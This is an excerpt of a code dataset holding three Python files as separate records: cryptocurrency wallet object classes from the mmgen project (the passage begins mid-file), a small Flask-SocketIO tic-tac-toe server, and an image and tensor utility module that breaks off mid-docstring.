1:\n\t\t\t\t\t\tidx = AddrIdx(i)\n\t\t\t\t\t\tif not idx:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tret.append(idx)\n\t\t\t\t\telif len(j) == 2:\n\t\t\t\t\t\tbeg = AddrIdx(j[0])\n\t\t\t\t\t\tif not beg:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend = AddrIdx(j[1])\n\t\t\t\t\t\tif not beg or (end < beg):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tret.extend([AddrIdx(x) for x in range(beg,end+1)])\n\t\t\t\t\telse: break\n\t\t\t\telse:\n\t\t\t\t\treturn list.__init__(self,sorted(set(ret))) # fell off end of loop - success\n\t\t\t\traise ValueError(f'{i!r}: invalid range')\n\t\texcept Exception as e:\n\t\t\treturn type(self).init_fail(e,idx_list or fmt_str)\n\nclass MMGenRange(tuple,InitErrors,MMGenObject):\n\n\tmin_idx = None\n\tmax_idx = None\n\n\tdef __new__(cls,*args):\n\t\ttry:\n\t\t\tif len(args) == 1:\n\t\t\t\ts = args[0]\n\t\t\t\tif type(s) == cls:\n\t\t\t\t\treturn s\n\t\t\t\tassert isinstance(s,str),'not a string or string subclass'\n\t\t\t\tss = s.split('-',1)\n\t\t\t\tfirst = int(ss[0])\n\t\t\t\tlast = int(ss.pop())\n\t\t\telse:\n\t\t\t\ts = repr(args) # needed if exception occurs\n\t\t\t\tassert len(args) == 2,'one format string arg or two start,stop args required'\n\t\t\t\tfirst,last = args\n\t\t\tassert first <= last, 'start of range greater than end of range'\n\t\t\tif cls.min_idx is not None:\n\t\t\t\tassert first >= cls.min_idx, f'start of range < {cls.min_idx:,}'\n\t\t\tif cls.max_idx is not None:\n\t\t\t\tassert last <= cls.max_idx, f'end of range > {cls.max_idx:,}'\n\t\t\treturn tuple.__new__(cls,(first,last))\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,s)\n\n\t@property\n\tdef first(self):\n\t\treturn self[0]\n\n\t@property\n\tdef last(self):\n\t\treturn self[1]\n\n\tdef iterate(self):\n\t\treturn range(self[0],self[1]+1)\n\n\t@property\n\tdef items(self):\n\t\treturn list(self.iterate())\n\nclass SubSeedIdxRange(MMGenRange):\n\tmin_idx = 1\n\tmax_idx = 1000000\n\nclass UnknownCoinAmt(Decimal): pass\n\nclass BTCAmt(Decimal,Hilite,InitErrors):\n\tcolor = 'yellow'\n\tmax_prec = 8\n\tmax_amt = 21000000\n\tsatoshi = Decimal('0.00000001')\n\tmin_coin_unit = satoshi\n\tamt_fs = '4.8'\n\tunits = ('satoshi',)\n\tforbidden_types = (float,int)\n\n\t# NB: 'from_decimal' rounds down to precision of 'min_coin_unit'\n\tdef __new__(cls,num,from_unit=None,from_decimal=False):\n\t\tif type(num) == cls:\n\t\t\treturn num\n\t\ttry:\n\t\t\tif from_unit:\n\t\t\t\tassert from_unit in cls.units, f'{from_unit!r}: unrecognized denomination for {cls.__name__}'\n\t\t\t\tassert type(num) == int,'value is not an integer'\n\t\t\t\tme = Decimal.__new__(cls,num * getattr(cls,from_unit))\n\t\t\telif from_decimal:\n\t\t\t\tassert type(num) == Decimal, f'number must be of type Decimal, not {type(num).__name__})'\n\t\t\t\tme = Decimal.__new__(cls,num).quantize(cls.min_coin_unit)\n\t\t\telse:\n\t\t\t\tfor t in cls.forbidden_types:\n\t\t\t\t\tassert type(num) is not t, f'number is of forbidden type {t.__name__}'\n\t\t\t\tme = Decimal.__new__(cls,str(num))\n\t\t\tassert me.normalize().as_tuple()[-1] >= -cls.max_prec,'too many decimal places in coin amount'\n\t\t\tif cls.max_amt:\n\t\t\t\tassert me <= cls.max_amt, f'{me}: coin amount too large (>{cls.max_amt})'\n\t\t\tassert me >= 0,'coin amount cannot be negative'\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,num)\n\n\tdef toSatoshi(self):\n\t\treturn int(Decimal(self) // self.satoshi)\n\n\tdef to_unit(self,unit,show_decimal=False):\n\t\tret = Decimal(self) // getattr(self,unit)\n\t\tif show_decimal and ret < 1:\n\t\t\treturn '{:.8f}'.format(ret).rstrip('0')\n\t\treturn int(ret)\n\n\t@classmethod\n\tdef fmtc(cls):\n\t\tcls.method_not_implemented()\n\n\tdef fmt(self,fs=None,color=False,suf='',prec=1000):\n\t\tif fs == None:\n\t\t\tfs = self.amt_fs\n\t\ts = str(int(self)) if int(self) == self else self.normalize().__format__('f')\n\t\tif '.' in fs:\n\t\t\tp1,p2 = list(map(int,fs.split('.',1)))\n\t\t\tss = s.split('.',1)\n\t\t\tif len(ss) == 2:\n\t\t\t\ta,b = ss\n\t\t\t\tret = a.rjust(p1) + '.' + ((b+suf).ljust(p2+len(suf)))[:prec]\n\t\t\telse:\n\t\t\t\tret = s.rjust(p1) + suf + (' ' * (p2+1))[:prec+1-len(suf)]\n\t\telse:\n\t\t\tret = s.ljust(int(fs))\n\t\treturn self.colorize(ret,color=color)\n\n\tdef hl(self,color=True):\n\t\treturn self.__str__(color=color)\n\n\tdef __str__(self,color=False): # format simply, no exponential notation\n\t\treturn self.colorize(\n\t\t\t\tstr(int(self)) if int(self) == self else\n\t\t\t\tself.normalize().__format__('f'),\n\t\t\tcolor=color)\n\n\tdef __repr__(self):\n\t\treturn \"{}('{}')\".format(type(self).__name__,self.__str__())\n\n\tdef __add__(self,other):\n\t\treturn type(self)(Decimal.__add__(self,other))\n\t__radd__ = __add__\n\n\tdef __sub__(self,other):\n\t\treturn type(self)(Decimal.__sub__(self,other))\n\n\tdef __mul__(self,other):\n\t\treturn type(self)('{:0.8f}'.format(Decimal.__mul__(self,Decimal(other))))\n\n\tdef __div__(self,other):\n\t\treturn type(self)('{:0.8f}'.format(Decimal.__div__(self,Decimal(other))))\n\n\tdef __neg__(self,other):\n\t\treturn type(self)(Decimal.__neg__(self,other))\n\nclass BCHAmt(BTCAmt): pass\nclass B2XAmt(BTCAmt): pass\nclass LTCAmt(BTCAmt): max_amt = 84000000\nclass XMRAmt(BTCAmt):\n\tmin_coin_unit = Decimal('0.000000000001')\n\tunits = ('min_coin_unit',)\n\nfrom .altcoins.eth.obj import ETHAmt,ETHNonce\n\nclass CoinAddr(str,Hilite,InitErrors,MMGenObject):\n\tcolor = 'cyan'\n\thex_width = 40\n\twidth = 1\n\ttrunc_ok = False\n\tdef __new__(cls,proto,addr):\n\t\tif type(addr) == cls:\n\t\t\treturn addr\n\t\ttry:\n\t\t\tassert set(addr) <= set(ascii_letters+digits),'contains non-alphanumeric characters'\n\t\t\tme = str.__new__(cls,addr)\n\t\t\tap = proto.parse_addr(addr)\n\t\t\tassert ap, f'coin address {addr!r} could not be parsed'\n\t\t\tme.addr_fmt = ap.fmt\n\t\t\tme.hex = ap.bytes.hex()\n\t\t\tme.proto = proto\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,addr,objname=f'{proto.cls_name} address')\n\n\t@classmethod\n\tdef fmtc(cls,addr,**kwargs):\n\t\tw = kwargs['width'] or cls.width\n\t\treturn super().fmtc(addr[:w-2]+'..' if w < len(addr) else addr, **kwargs)\n\nclass TokenAddr(CoinAddr):\n\tcolor = 'blue'\n\nclass ViewKey(object):\n\tdef __new__(cls,proto,viewkey):\n\t\tif proto.name == 'Zcash':\n\t\t\treturn ZcashViewKey.__new__(ZcashViewKey,proto,viewkey)\n\t\telif proto.name == 'Monero':\n\t\t\treturn MoneroViewKey.__new__(MoneroViewKey,viewkey)\n\t\telse:\n\t\t\traise ValueError(f'{proto.name}: protocol does not support view keys')\n\nclass ZcashViewKey(CoinAddr): hex_width = 128\n\nclass SeedID(str,Hilite,InitErrors):\n\tcolor = 'blue'\n\twidth = 8\n\ttrunc_ok = False\n\tdef __new__(cls,seed=None,sid=None):\n\t\tif type(sid) == cls:\n\t\t\treturn sid\n\t\ttry:\n\t\t\tif seed:\n\t\t\t\tfrom .seed import SeedBase\n\t\t\t\tassert isinstance(seed,SeedBase),'not a subclass of SeedBase'\n\t\t\t\tfrom .util import make_chksum_8\n\t\t\t\treturn str.__new__(cls,make_chksum_8(seed.data))\n\t\t\telif sid:\n\t\t\t\tassert set(sid) <= set(hexdigits.upper()),'not uppercase hex digits'\n\t\t\t\tassert len(sid) == cls.width, f'not {cls.width} characters wide'\n\t\t\t\treturn str.__new__(cls,sid)\n\t\t\traise ValueError('no arguments provided')\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,seed or sid)\n\nclass SubSeedIdx(str,Hilite,InitErrors):\n\tcolor = 'red'\n\ttrunc_ok = False\n\tdef __new__(cls,s):\n\t\tif type(s) == cls:\n\t\t\treturn s\n\t\ttry:\n\t\t\tassert isinstance(s,str),'not a string or string subclass'\n\t\t\tidx = s[:-1] if s[-1] in 'SsLl' else s\n\t\t\tfrom .util import is_int\n\t\t\tassert is_int(idx),\"valid format: an integer, plus optional letter 'S','s','L' or 'l'\"\n\t\t\tidx = int(idx)\n\t\t\tassert idx >= SubSeedIdxRange.min_idx, 'subseed index < {:,}'.format(SubSeedIdxRange.min_idx)\n\t\t\tassert idx <= SubSeedIdxRange.max_idx, 'subseed index > {:,}'.format(SubSeedIdxRange.max_idx)\n\n\t\t\tsstype,ltr = ('short','S') if s[-1] in 'Ss' else ('long','L')\n\t\t\tme = str.__new__(cls,str(idx)+ltr)\n\t\t\tme.idx = idx\n\t\t\tme.type = sstype\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,s)\n\nclass MMGenID(str,Hilite,InitErrors,MMGenObject):\n\tcolor = 'orange'\n\twidth = 0\n\ttrunc_ok = False\n\tdef __new__(cls,proto,id_str):\n\t\ttry:\n\t\t\tss = str(id_str).split(':')\n\t\t\tassert len(ss) in (2,3),'not 2 or 3 colon-separated items'\n\t\t\tt = proto.addr_type((ss[1],proto.dfl_mmtype)[len(ss)==2])\n\t\t\tme = str.__new__(cls,'{}:{}:{}'.format(ss[0],t,ss[-1]))\n\t\t\tme.sid = SeedID(sid=ss[0])\n\t\t\tme.idx = AddrIdx(ss[-1])\n\t\t\tme.mmtype = t\n\t\t\tassert t in proto.mmtypes, f'{t}: invalid address type for {proto.cls_name}'\n\t\t\tme.al_id = str.__new__(AddrListID,me.sid+':'+me.mmtype) # checks already done\n\t\t\tme.sort_key = '{}:{}:{:0{w}}'.format(me.sid,me.mmtype,me.idx,w=me.idx.max_digits)\n\t\t\tme.proto = proto\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,id_str)\n\nclass TwMMGenID(str,Hilite,InitErrors,MMGenObject):\n\tcolor = 'orange'\n\twidth = 0\n\ttrunc_ok = False\n\tdef __new__(cls,proto,id_str):\n\t\tif type(id_str) == cls:\n\t\t\treturn id_str\n\t\tret = None\n\t\ttry:\n\t\t\tret = MMGenID(proto,id_str)\n\t\t\tsort_key,idtype = ret.sort_key,'mmgen'\n\t\texcept Exception as e:\n\t\t\ttry:\n\t\t\t\tassert id_str.split(':',1)[0] == proto.base_coin.lower(),(\n\t\t\t\t\tf'not a string beginning with the prefix {proto.base_coin.lower()!r}:' )\n\t\t\t\tassert set(id_str[4:]) <= set(ascii_letters+digits),'contains non-alphanumeric characters'\n\t\t\t\tassert len(id_str) > 4,'not more that four characters long'\n\t\t\t\tret,sort_key,idtype = str(id_str),'z_'+id_str,'non-mmgen'\n\t\t\texcept Exception as e2:\n\t\t\t\treturn cls.init_fail(e,id_str,e2=e2)\n\n\t\tme = str.__new__(cls,ret)\n\t\tme.obj = ret\n\t\tme.sort_key = sort_key\n\t\tme.type = idtype\n\t\tme.proto = proto\n\t\treturn me\n\n# non-displaying container for TwMMGenID,TwComment\nclass TwLabel(str,InitErrors,MMGenObject):\n\texc = BadTwLabel\n\tpassthru_excs = (BadTwComment,)\n\tdef __new__(cls,proto,text):\n\t\tif type(text) == cls:\n\t\t\treturn text\n\t\ttry:\n\t\t\tts = text.split(None,1)\n\t\t\tmmid = TwMMGenID(proto,ts[0])\n\t\t\tcomment = TwComment(ts[1] if len(ts) == 2 else '')\n\t\t\tme = str.__new__( cls, mmid + (' ' + comment if comment else '') )\n\t\t\tme.mmid = mmid\n\t\t\tme.comment = comment\n\t\t\tme.proto = proto\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,text)\n\nclass HexStr(str,Hilite,InitErrors):\n\tcolor = 'red'\n\twidth = None\n\thexcase = 'lower'\n\ttrunc_ok = False\n\tdef __new__(cls,s,case=None):\n\t\tif type(s) == cls:\n\t\t\treturn s\n\t\tif case == None:\n\t\t\tcase = cls.hexcase\n\t\ttry:\n\t\t\tassert isinstance(s,str),'not a string or string subclass'\n\t\t\tassert case in ('upper','lower'), f'{case!r} incorrect case specifier'\n\t\t\tassert set(s) <= set(getattr(hexdigits,case)()), f'not {case}case hexadecimal symbols'\n\t\t\tassert not len(s) % 2,'odd-length string'\n\t\t\tif cls.width:\n\t\t\t\tassert len(s) == cls.width, f'Value is not {cls.width} characters wide'\n\t\t\treturn str.__new__(cls,s)\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,s)\n\nclass CoinTxID(HexStr): color,width,hexcase = 'purple',64,'lower'\nclass WalletPassword(HexStr): color,width,hexcase = 'blue',32,'lower'\nclass MoneroViewKey(HexStr): color,width,hexcase = 'cyan',64,'lower' # FIXME - no checking performed\nclass MMGenTxID(HexStr): color,width,hexcase = 'red',6,'upper'\n\nclass WifKey(str,Hilite,InitErrors):\n\t\"\"\"\n\tInitialize a WIF key, checking its well-formedness.\n\tThe numeric validity of the private key it encodes is not checked.\n\t\"\"\"\n\twidth = 53\n\tcolor = 'blue'\n\tdef __new__(cls,proto,wif):\n\t\tif type(wif) == cls:\n\t\t\treturn wif\n\t\ttry:\n\t\t\tassert set(wif) <= set(ascii_letters+digits),'not an ascii alphanumeric string'\n\t\t\tproto.parse_wif(wif) # raises exception on error\n\t\t\treturn str.__new__(cls,wif)\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,wif)\n\nclass PubKey(HexStr,MMGenObject): # TODO: add some real checks\n\tdef __new__(cls,s,privkey):\n\t\ttry:\n\t\t\tme = HexStr.__new__(cls,s,case='lower')\n\t\t\tme.privkey = privkey\n\t\t\tme.compressed = privkey.compressed\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,s)\n\nclass PrivKey(str,Hilite,InitErrors,MMGenObject):\n\t\"\"\"\n\tInput: a) raw, non-preprocessed bytes; or b) WIF key.\n\tOutput: preprocessed hexadecimal key, plus WIF key in 'wif' attribute\n\tFor coins without a WIF format, 'wif' contains the preprocessed hex.\n\tThe numeric validity of the resulting key is always checked.\n\t\"\"\"\n\tcolor = 'red'\n\twidth = 64\n\ttrunc_ok = False\n\n\tcompressed = ImmutableAttr(bool,typeconv=False)\n\twif = ImmutableAttr(WifKey,typeconv=False)\n\n\t# initialize with (priv_bin,compressed), WIF or self\n\tdef __new__(cls,proto,s=None,compressed=None,wif=None,pubkey_type=None):\n\t\tif type(s) == cls:\n\t\t\treturn s\n\t\tif wif:\n\t\t\ttry:\n\t\t\t\tassert s == None,\"'wif' and key hex args are mutually exclusive\"\n\t\t\t\tassert set(wif) <= set(ascii_letters+digits),'not an ascii alphanumeric string'\n\t\t\t\tk = proto.parse_wif(wif) # raises exception on error\n\t\t\t\tme = str.__new__(cls,k.sec.hex())\n\t\t\t\tme.compressed = k.compressed\n\t\t\t\tme.pubkey_type = k.pubkey_type\n\t\t\t\tme.wif = str.__new__(WifKey,wif) # check has been done\n\t\t\t\tme.orig_hex = None\n\t\t\t\tif k.sec != proto.preprocess_key(k.sec,k.pubkey_type):\n\t\t\t\t\traise PrivateKeyError(\n\t\t\t\t\t\tf'{proto.cls_name} WIF key {me.wif!r} encodes private key with invalid value {me}')\n\t\t\t\tme.proto = proto\n\t\t\t\treturn me\n\t\t\texcept Exception as e:\n\t\t\t\treturn cls.init_fail(e,s,objname=f'{proto.coin} WIF key')\n\t\telse:\n\t\t\ttry:\n\t\t\t\tassert s,'private key bytes data missing'\n\t\t\t\tassert pubkey_type is not None,\"'pubkey_type' arg missing\"\n\t\t\t\tassert len(s) == cls.width // 2, f'key length must be {cls.width // 2} bytes'\n\t\t\t\tif pubkey_type == 'password': # skip WIF creation and pre-processing for passwds\n\t\t\t\t\tme = str.__new__(cls,s.hex())\n\t\t\t\telse:\n\t\t\t\t\tassert compressed is not None, \"'compressed' arg missing\"\n\t\t\t\t\tassert type(compressed) == bool,(\n\t\t\t\t\t\tf\"'compressed' must be of type bool, not {type(compressed).__name__}\" )\n\t\t\t\t\tme = str.__new__(cls,proto.preprocess_key(s,pubkey_type).hex())\n\t\t\t\t\tme.wif = WifKey(proto,proto.hex2wif(me,pubkey_type,compressed))\n\t\t\t\t\tme.compressed = compressed\n\t\t\t\tme.pubkey_type = pubkey_type\n\t\t\t\tme.orig_hex = s.hex() # save the non-preprocessed key\n\t\t\t\tme.proto = proto\n\t\t\t\treturn me\n\t\t\texcept Exception as e:\n\t\t\t\treturn cls.init_fail(e,s)\n\nclass AddrListID(str,Hilite,InitErrors,MMGenObject):\n\twidth = 10\n\ttrunc_ok = False\n\tcolor = 'yellow'\n\tdef __new__(cls,sid,mmtype):\n\t\ttry:\n\t\t\tassert type(sid) == SeedID, f'{sid!r} not a SeedID instance'\n\t\t\tif not isinstance(mmtype,(MMGenAddrType,MMGenPasswordType)):\n\t\t\t\traise ValueError(f'{mmtype!r}: not an instance of MMGenAddrType or MMGenPasswordType')\n\t\t\tme = str.__new__(cls,sid+':'+mmtype)\n\t\t\tme.sid = sid\n\t\t\tme.mmtype = mmtype\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e, f'sid={sid}, mmtype={mmtype}')\n\nclass MMGenLabel(str,Hilite,InitErrors):\n\tcolor = 'pink'\n\tallowed = []\n\tforbidden = []\n\tmax_len = 0\n\tmin_len = 0\n\tmax_screen_width = 0 # if != 0, overrides max_len\n\tdesc = 'label'\n\tdef __new__(cls,s,msg=None):\n\t\tif type(s) == cls:\n\t\t\treturn s\n\t\tfor k in cls.forbidden,cls.allowed:\n\t\t\tassert type(k) == list\n\t\t\tfor ch in k: assert type(ch) == str and len(ch) == 1\n\t\ttry:\n\t\t\ts = s.strip()\n\t\t\tfor ch in s:\n\t\t\t\t# Allow: (L)etter,(N)umber,(P)unctuation,(S)ymbol,(Z)space\n\t\t\t\t# Disallow: (C)ontrol,(M)combining\n\t\t\t\t# Combining characters create width formatting issues, so disallow them for now\n\t\t\t\tif unicodedata.category(ch)[0] in ('C','M'):\n\t\t\t\t\traise ValueError('{!a}: {} characters not allowed'.format(ch,\n\t\t\t\t\t\t{ 'C':'control', 'M':'combining' }[unicodedata.category(ch)[0]] ))\n\n\t\t\tme = str.__new__(cls,s)\n\n\t\t\tif cls.max_screen_width:\n\t\t\t\tme.screen_width = len(s) + len([1 for ch in s if unicodedata.east_asian_width(ch) in ('F','W')])\n\t\t\t\tassert me.screen_width <= cls.max_screen_width, f'too wide (>{cls.max_screen_width} screen width)'\n\t\t\telse:\n\t\t\t\tassert len(s) <= cls.max_len, f'too long (>{cls.max_len} symbols)'\n\n\t\t\tassert len(s) >= cls.min_len, f'too short (<{cls.min_len} symbols)'\n\n\t\t\tif cls.allowed and not set(list(s)).issubset(set(cls.allowed)):\n\t\t\t\traise ValueError('contains non-allowed symbols: ' + ' '.join(set(list(s)) - set(cls.allowed)) )\n\n\t\t\tif cls.forbidden and any(ch in s for ch in cls.forbidden):\n\t\t\t\traise ValueError('contains one of these forbidden symbols: ' + ' '.join(cls.forbidden) )\n\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,s)\n\nclass MMGenWalletLabel(MMGenLabel):\n\tmax_len = 48\n\tdesc = 'wallet label'\n\nclass TwComment(MMGenLabel):\n\tmax_screen_width = 80\n\tdesc = 'tracking wallet comment'\n\texc = BadTwComment\n\nclass MMGenTxLabel(MMGenLabel):\n\tmax_len = 72\n\tdesc = 'transaction label'\n\nclass MMGenPWIDString(MMGenLabel):\n\tmax_len = 256\n\tmin_len = 1\n\tdesc = 'password ID string'\n\tforbidden = list(' :/\\\\')\n\ttrunc_ok = False\n\nclass SeedSplitSpecifier(str,Hilite,InitErrors,MMGenObject):\n\tcolor = 'red'\n\tdef __new__(cls,s):\n\t\tif type(s) == cls:\n\t\t\treturn s\n\t\ttry:\n\t\t\tarr = s.split(':')\n\t\t\tassert len(arr) in (2,3), 'cannot be parsed'\n\t\t\ta,b,c = arr if len(arr) == 3 else ['default'] + arr\n\t\t\tme = str.__new__(cls,s)\n\t\t\tme.id = SeedSplitIDString(a)\n\t\t\tme.idx = SeedShareIdx(b)\n\t\t\tme.count = SeedShareCount(c)\n\t\t\tassert me.idx <= me.count, 'share index greater than share count'\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,s)\n\nclass SeedSplitIDString(MMGenPWIDString):\n\tdesc = 'seed split ID string'\n\nfrom collections import namedtuple\nati = namedtuple('addrtype_info',\n\t['name','pubkey_type','compressed','gen_method','addr_fmt','wif_label','extra_attrs','desc'])\n\nclass MMGenAddrType(str,Hilite,InitErrors,MMGenObject):\n\twidth = 1\n\ttrunc_ok = False\n\tcolor = 'blue'\n\n\tname = ImmutableAttr(str)\n\tpubkey_type = ImmutableAttr(str)\n\tcompressed = ImmutableAttr(bool,set_none_ok=True)\n\tgen_method = ImmutableAttr(str,set_none_ok=True)\n\taddr_fmt = ImmutableAttr(str,set_none_ok=True)\n\twif_label = ImmutableAttr(str,set_none_ok=True)\n\textra_attrs = ImmutableAttr(tuple,set_none_ok=True)\n\tdesc = ImmutableAttr(str)\n\n\tmmtypes = {\n\t\t'L': ati('legacy', 'std', False,'p2pkh', 'p2pkh', 'wif', (), 'Legacy uncompressed address'),\n\t\t'C': ati('compressed','std', True, 'p2pkh', 'p2pkh', 'wif', (), 'Compressed P2PKH address'),\n\t\t'S': ati('segwit', 'std', True, 'segwit', 'p2sh', 'wif', (), 'Segwit P2SH-P2WPKH address'),\n\t\t'B': ati('bech32', 'std', True, 'bech32', 'bech32', 'wif', (), 'Native Segwit (Bech32) address'),\n\t\t'E': ati('ethereum', 'std', False,'ethereum','ethereum','privkey', ('wallet_passwd',),'Ethereum address'),\n\t\t'Z': ati('zcash_z','zcash_z',False,'zcash_z', 'zcash_z', 'wif', ('viewkey',), 'Zcash z-address'),\n\t\t'M': ati('monero', 'monero', False,'monero', 'monero', 'spendkey',('viewkey','wallet_passwd'),'Monero address'),\n\t}\n\tdef __new__(cls,proto,id_str,errmsg=None):\n\t\tif type(id_str) == cls:\n\t\t\treturn id_str\n\t\ttry:\n\t\t\tfor k,v in cls.mmtypes.items():\n\t\t\t\tif id_str in (k,v.name):\n\t\t\t\t\tif id_str == v.name:\n\t\t\t\t\t\tid_str = k\n\t\t\t\t\tme = str.__new__(cls,id_str)\n\t\t\t\t\tfor k in v._fields:\n\t\t\t\t\t\tsetattr(me,k,getattr(v,k))\n\t\t\t\t\tif me not in proto.mmtypes + ('P',):\n\t\t\t\t\t\traise ValueError(f'{me.name!r}: invalid address type for {proto.name} protocol')\n\t\t\t\t\tme.proto = proto\n\t\t\t\t\treturn me\n\t\t\traise ValueError(f'{id_str}: unrecognized address type for protocol {proto.name}')\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail( e,\n\t\t\t\tf\"{errmsg or ''}{id_str!r}: invalid value for {cls.__name__} ({e!s})\",\n\t\t\t\tpreformat = True )\n\n\t@classmethod\n\tdef get_names(cls):\n\t\treturn [v.name for v in cls.mmtypes.values()]\n\nclass MMGenPasswordType(MMGenAddrType):\n\tmmtypes = {\n\t\t'P': ati('password', 'password', None, None, None, None, None, 'Password generated from MMGen seed')\n\t}\n","repo_name":"totaltrader/mmgen","sub_path":"mmgen/obj.py","file_name":"obj.py","file_ext":"py","file_size_in_byte":30105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"11418747229","text":"from flask import Flask, send_from_directory, render_template, request, json\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n\nsockets = {}\ncolors = {\n 'horizontal': {\n 'r': 255,\n 'g': 0,\n 'b': 255,\n 'a': 255\n },\n 'vertical': {\n 'r': 255,\n 'g': 255,\n 'b': 0,\n 'a': 255\n }\n}\n\n\n# Object that represents a socket connection\nclass Socket(object):\n def __init__(self, sid, username, color, opponent_color, turn):\n self.sid = sid\n self.connected = True\n self.color = color\n self.opponent_color = opponent_color\n self.turn = turn\n self.username = username\n\n # Emits data to a socket's unique room\n def emit(self, event, data):\n emit(event, data, room=self.sid)\n\n def switch_turn(self):\n self.turn = not self.turn\n\n\n@app.route('/')\ndef home():\n return render_template(\n 'index.html',\n username_maxlength=12\n )\n\n\n@socketio.on('connect')\ndef handle_connect():\n print('someone connected')\n\n\n@socketio.on('start')\ndef start(data):\n username = data.get('username', 'Awkward')\n color, opponent_color, turn = (\n (colors.get('horizontal'), colors.get('vertical'), True)\n if len(sockets) % 2 else\n (colors.get('vertical'), colors.get('horizontal'), False)\n )\n sockets[request.sid] = Socket(request.sid, username, color, opponent_color, turn)\n\n\n@socketio.on('init')\ndef init(data):\n horizontal_username, vertical_username = None, None\n horizontal = colors.get('horizontal')\n vertical = colors.get('vertical')\n for sid in sockets:\n if sockets[sid].color == horizontal:\n horizontal_username = sockets[sid].username\n if sockets[sid].color == vertical:\n vertical_username = sockets[sid].username\n response = {\n 'message': 'You are connected with id={}'.format(request.sid),\n 'horizontal': colors.get('horizontal'),\n 'vertical': colors.get('vertical'),\n 'turn': sockets[request.sid].turn,\n 'color': sockets[request.sid].color,\n 'horizontal_username': horizontal_username,\n 'vertical_username': vertical_username\n }\n sockets[request.sid].emit('init_response', response)\n\n\n@socketio.on('play')\ndef play(data):\n color = sockets[request.sid].color\n for id, socket in sockets.items():\n socket.switch_turn()\n socket.emit(\n 'play_response', {\n 'id': data.get('id'),\n 'color': color,\n 'turn': socket.turn\n }\n )\n\n\n@socketio.on('play_again')\ndef play_again():\n for id, socket in sockets.items():\n socket.switch_turn()\n socket.emit(\n 'play_again_response', {\n 'turn': socket.turn\n }\n )\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","repo_name":"Strovala/XO","sub_path":"xo/xo.py","file_name":"xo.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44314827259","text":"from ast import Import\nimport torch\nimport math\nimport warnings\nimport numpy as np\nimport cv2\nimport PIL.Image\n\n\ndef save_image(img: torch.Tensor, path: str):\n img = (img.permute(1, 2, 0) * 127.5 + 128).clamp(0, 255).to(torch.uint8)\n PIL.Image.fromarray(img.cpu().numpy(), 'RGB').save(path, quality=100, subsampling=0)\n\ndef cam(x, size = 256):\n x = x - np.min(x)\n cam_img = x / np.max(x)\n cam_img = np.uint8(255 * cam_img)\n cam_img = cv2.resize(cam_img, (size, size))\n cam_img = cv2.applyColorMap(cam_img, cv2.COLORMAP_JET)\n return cam_img / 255.0\n\ndef hw2heatmap(x: torch.Tensor, size = 256):\n device = x.device\n assert len(x.shape) == 2\n map: np.ndarray = cam(x.detach().cpu().numpy(), size)\n map = map[:,:,::-1].copy() * 2 - 1\n return torch.from_numpy(map).permute(2, 0, 1).contiguous().to(device)\n\ndef bhw2heatmap(bx: torch.Tensor, size = 256):\n ans = []\n for i in range(bx.size(0)):\n ans.append(hw2heatmap(bx[i][0]))\n return torch.stack(ans, dim=0)\n\ndef image_blend_normal(img1: torch.Tensor, img2: torch.Tensor, alpha_a: float = 0.5):\n return img1 * alpha_a + img2 * (1 - alpha_a)\n\n## taken from timm package, thanks\ndef _no_grad_trunc_normal_(tensor, mean, std, a, b):\n # Cut & paste from PyTorch official master until it's in a few official releases - RW\n # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf\n def norm_cdf(x):\n # Computes standard normal cumulative distribution function\n return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0\n\n if (mean < a - 2 * std) or (mean > b + 2 * std):\n warnings.warn(\n \"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. \"\n \"The distribution of values may be incorrect.\",\n stacklevel=2,\n )\n\n with torch.no_grad():\n # Values are generated by using a truncated uniform distribution and\n # then using the inverse CDF for the normal distribution.\n # Get upper and lower cdf values\n l = norm_cdf((a - mean) / std)\n u = norm_cdf((b - mean) / std)\n\n # Uniformly fill tensor with values from [l, u], then translate to\n # [2l-1, 2u-1].\n tensor.uniform_(2 * l - 1, 2 * u - 1)\n\n # Use inverse cdf transform for normal distribution to get truncated\n # standard normal\n tensor.erfinv_()\n\n # Transform to proper mean, std\n tensor.mul_(std * math.sqrt(2.0))\n tensor.add_(mean)\n\n # Clamp to ensure it's in the proper range\n tensor.clamp_(min=a, max=b)\n return tensor\n\n\ndef trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):\n # type: (Tensor, float, float, float, float) -> Tensor\n r\"\"\"Fills the input Tensor with values drawn from a truncated\n normal distribution. The values are effectively drawn from the\n normal distribution :math:`\\mathcal{N}(\\text{mean}, \\text{std}^2)`\n with values outside :math:`[a, b]` redrawn until they are within\n the bounds. The method used for generating the random values works\n best when :math:`a \\leq \\text{mean} \\leq b`.\n Args:\n tensor: an n-dimensional `torch.Tensor`\n mean: the mean of the normal distribution\n std: the standard deviation of the normal distribution\n a: the minimum cutoff value\n b: the maximum cutoff value\n Examples:\n >>> w = torch.empty(3, 5)\n >>> 